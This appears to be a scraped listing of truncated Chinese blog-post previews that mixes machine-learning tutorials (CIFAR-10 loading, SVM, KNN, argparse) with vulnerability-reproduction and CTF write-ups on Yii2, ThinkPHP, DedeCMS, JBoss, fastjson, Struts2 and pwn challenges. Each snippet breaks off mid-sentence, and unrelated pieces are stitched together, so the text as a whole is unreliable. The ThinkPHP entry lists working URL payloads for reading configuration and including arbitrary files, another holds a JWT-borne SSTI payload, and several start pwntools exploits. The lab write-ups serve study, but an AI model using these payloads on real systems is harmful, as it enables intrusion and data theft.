主要是练了一下数据读取 这次用的cifa10,整个是一个字典,取了前100个去训练了一下 要先把每一行reshape成32 * 32 * 3 self.data = self.data.reshape(-1, 32, 32, 3) __getitem__ 里放到tranforms之前先Image.fromarray() VGG_dataset: from torch.utils import data from P
Yii2漏洞复现 环境准备: 1.win10 2.PHPstudy :php版本7.3.4 3.yii2版本:2.0.37和2.0.38 环境的安装准备: 1.phpstudy的安装就不多说了,关键后面要运行php,建议吧php放进环境变量中(可以百度一下) 2.搭建yii2,可以去github下载。 https://github.com/yiisoft/yii2/releases/tag/2.0.37 下载
影响版本 小于5.0.23小于5.1.30 5.0.x ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=index/\think\app/in
DedeCMS V5.7 漏洞复现 XSS漏洞 首先我们在首页要进行用户的注册以及登录 这里我们已经提前注册过了,登录即可 普通用户账号密码:root/passwd 管理员账号密码:admin/pikachu 然后我们点击商店 然后点击漏洞复现 接下来我们直接加入购物车并查看 然后点击下一步 配送方式随便选
今天查看服务器tomcat日志的时候发现了报错: HTTP method names must be tokens,上面的详细为: org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header Note: further occurrences of HTTP request parsing errors will be logged at DEBUG lev
ez_py 随便输一个账密,进入后台,存在 jwt,使用 jwt crack 暴力破解,得到 secret 是 CTf4r 登进去,发现啥东西没有,既然是 python 考点大概是 ssti,寻找注入点就是 user,绕过过滤,构造 payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiP25hbWU9e3soeHxhdHRyKHJlcXVlc3QuY2
train.py import torch import torch.nn as nn import torch.nn.functional as F import os from tensorboardX import SummaryWriter import torchvision.datasets as Datasets import torchvision.transforms as transforms import torch.utils.data.dataloader as D
之前流畅的更新(两三天一更),突然断了,我来解释一下原因,顺便聊聊近期更新安排。 首先原因是突然来了深信服的面试,将精力转移到了复习等事情上,结果面试不是技术面试,有点意外,回来后中秋出门较多,也带一点点假期的懒惰吧,就没有再进行跟进。现在回顾一下是因为时间线安排不合理导致,没有给定
服务器: windows 7 攻击机: windows 10 一、环境搭建 使用win7搭建环境,由于jboss依赖Java基本环境,所以应当先安装Java环境,使用jdk-6u14版本,Java安装完成后记得去环境变量配置 jboss安装包在jboss下载页面下载即可,为压缩包,此处使用版本为4.2.2.GA 下载完成后将压缩包内的文件
进度 项目怎么运行? 文档说明 retro安装出现许多报错,解决: python从3.6.0升级到3.6.2 pip uninstall retro pip install gym-retro tf提示许多错误… 先放弃这个复现项目 部分项目链接如下: 视频 github有几千星,可是源代码不断报错… 项目很垃圾,为什么没有安装版本说明个人很
WEB super_php <?php error_reporting(E_NOTICE); highlight_file(__FILE__); @session_start(); $username = @$_GET['username']; if(!@isset($username['admin'])||$username['admin'] != @md5($_SESSION['username'])) {die(&
复现SRCNN时,配置命令行参数出错。 知识点介绍: argparse是一个Python模块:命令行选项、参数和子命令解析器。 主要有三个步骤: 创建 ArgumentParser() 对象调用 add_argument() 方法添加参数使用 parse_args() 解析添加的参数 示例代码: parser = argparse.ArgumentParser()
武大-huang 15日前完成 昨天陈lifei老师问了我你为何不去咨询上一届去复旦的同学?场面一度尴尬。 现在想想有点好笑~
目录代码及复现清单依赖项训练脚本评估脚本预训练模型结果总结复现流程(无公开代码):常见问题其它资源Reference 代码及复现 清单 依赖项 硬件条件及软件条件。如果你用的语言是 Python,那么当使用 pip 和 virtualenv 时,你需要提供 requirements.txt 文件;当使用 anaconda 时,你需要提供
Vulhub-Thinkphp 前言 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 正文-5.0.23 首先启用docker环境 root@null-virtual-machine:/home/null# cd
KCTF 第二题 南冥神功 硬看,发现通关要求是把aS_1全搞成1 然后这里是在aS_1数组里的移动,像是二维平面八方向走一样 有个很智障的地方就是aS_1的起始数值是这个'S'不是0……直接跳过结果搜不出路径 只能走到为0的位置,走过之后就置为1,也就是一笔画路径 搜了一下果然只有一条符合
no_output 可以说简单,也可以说难的题目。会用ret2dlresolve就简单,不知道就难。 exp: from pwn import * import time context.log_level = 'debug' #p=remote("39.105.138.97","1234") s=process('./test') s.send("\x00") raw_input(">
1 scikit_learn里的SVM scikit-learn里对SVM的算法实现都在包sklearn.svm下,其中SVC类是用来进行分类的任务,SVR是用来进行数值回归任务的。 在计算机中,可以用离散的数值来代替连续的数值进行回归。 以SVC为例,首先选择SVM核函数,由参数kernel指定,其中linear表示本章介绍的线性函数,它
babypwn exp from pwn import * from z3 import * context.log_level='debug' p=process(["/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/ld-2.27.so","./babypwn"],env={'LD_PRELOAD':'/root/glibc-all-in-one-m
缺陷报告基础* 一,缺陷的概念:英文defect,软件或者程序中存在的错误或者问题,表现为产品的功能没有满足需求。 二,缺陷的范围定义: 1) 软件没有达到需求规格说明书要求的功能。 2) 软件出现需求规格说明书中明确不会出现的问题。 3) 软件超出了需求规格说明书中要求的功能 4) 软件出现
1. 算法原理 核心思想:未标记样本的类别,由距离其最近的k个邻居投票来决定。 已知条件:具有已标记数据集且知道数据集中每个样本所属类别。一个未标记数据样本。 目的:预测未标记数据样本所属类别。 算法原理伪代码: 假设 X_test 为待标记的数据样本,X_train为已标记的数据集 遍历 X_t
fastjson漏洞复现 fastjson漏洞原理简介靶机环境搭建漏洞探测发送一个错的数据包正确的数据包发送 漏洞利用docker 搭建靶机编译恶意类启动HTTP服务启动rmi服务发送数据 利用fastjson漏洞反弹shell fastjson漏洞原理简介 若lookup函数中的参数攻击者可控,便可以指向攻
github源码:github 源码链接,已上传百度云链接:https://pan.baidu.com/s/10jv__0CbKdd-kUKpBP6JiQ 提取码:hroa windows,GPU,CUDA(推荐10.0,cudnn百度查询相关匹配版本及配置教程, pytorch1.0.1(pip无法下载 百度云链接链接:https://pan.baidu.com/s/1zlOpwnrcKhFUtD2AzWVMTA 提取
题目 <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; public function append(
1. Struts2简介 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新